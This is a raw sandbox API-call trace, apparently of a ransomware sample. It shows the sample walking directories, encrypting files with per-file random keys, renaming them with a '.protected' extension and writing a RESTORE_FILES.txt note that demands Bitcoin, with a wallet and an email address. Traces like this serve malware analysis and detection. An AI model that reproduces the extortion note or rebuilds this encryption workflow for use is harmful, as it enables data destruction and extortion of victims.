[0093.549] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.549] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.549] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".txt") returned 0x0 [0093.549] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".rar") returned 0x0 [0093.549] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".zip") returned 0x0 [0093.550] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.557] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.557] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.557] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.557] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.558] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.558] CloseHandle (hObject=0x150) returned 1 [0093.558] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected") returned 104 [0093.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.protected")) returned 1 [0093.558] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.558] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Windows") returned -1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files") returned -1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files (x86)") returned -1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="$Recycle.bin") 
returned 1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="System Volume Information") returned -1 [0093.559] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrIW (lpFirst="MSNBC News~.feed-ms", lpSrch=".protected") returned 0x0 [0093.559] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.559] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.559] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.559] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".txt") returned 0x0 [0093.559] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".rar") returned 0x0 [0093.559] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".zip") returned 0x0 [0093.560] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.572] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.572] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.572] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.572] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.572] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.572] CloseHandle (hObject=0x150) returned 1 [0093.572] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected") returned 97 [0093.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.protected")) returned 1 [0093.573] FindNextFileW (in: hFindFile=0x47ba90, 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.573] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.573] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt") returned 85 [0093.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.574] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.574] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.574] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.574] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.574] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.574] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.575] CloseHandle (hObject=0x14c) returned 1 [0093.575] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Windows") returned -1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files") returned -1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files (x86)") returned -1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="$Recycle.bin") returned 1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="System Volume Information") returned -1 [0093.575] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 90 [0093.575] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2=".") returned 1 [0093.575] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="..") returned 1 [0093.576] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned 92 [0093.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.576] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.576] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.576] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.576] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.") returned 92 [0093.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.576] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.576] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.576] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.576] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.576] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.577] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.577] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.577] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.577] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.577] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\..") returned 93 [0093.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.577] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.577] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.577] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.577] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.577] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="Windows") returned -1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files") returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files (x86)") returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="$Recycle.bin") returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="System Volume Information") returned 1 [0093.577] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 101 [0093.577] lstrcmpW (lpString1="WebSlices~", lpString2=".") returned 1 [0093.577] lstrcmpW (lpString1="WebSlices~", lpString2="..") returned 1 [0093.578] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned 103 [0093.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0093.578] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.578] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.578] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.578] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.578] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 
[0093.578] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.") returned 103 [0093.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.578] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.579] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0093.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0093.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.579] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.579] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.579] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.579] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.579] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.579] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.579] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\..") returned 104 [0093.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0093.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.579] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.579] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0093.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0093.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.579] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.579] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Windows") returned -1 [0093.579] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files") returned 1 [0093.582] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files (x86)") returned 1 [0093.582] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.582] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="System Volume Information") returned 1 [0093.582] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrIW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".protected") returned 0x0 [0093.582] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", 
lpString2="RESTORE_FILES.txt") returned 1 [0093.582] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0093.582] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0093.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0093.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".txt") returned 0x0 [0093.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".rar") returned 0x0 [0093.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".zip") returned 0x0 [0093.582] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0093.585] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
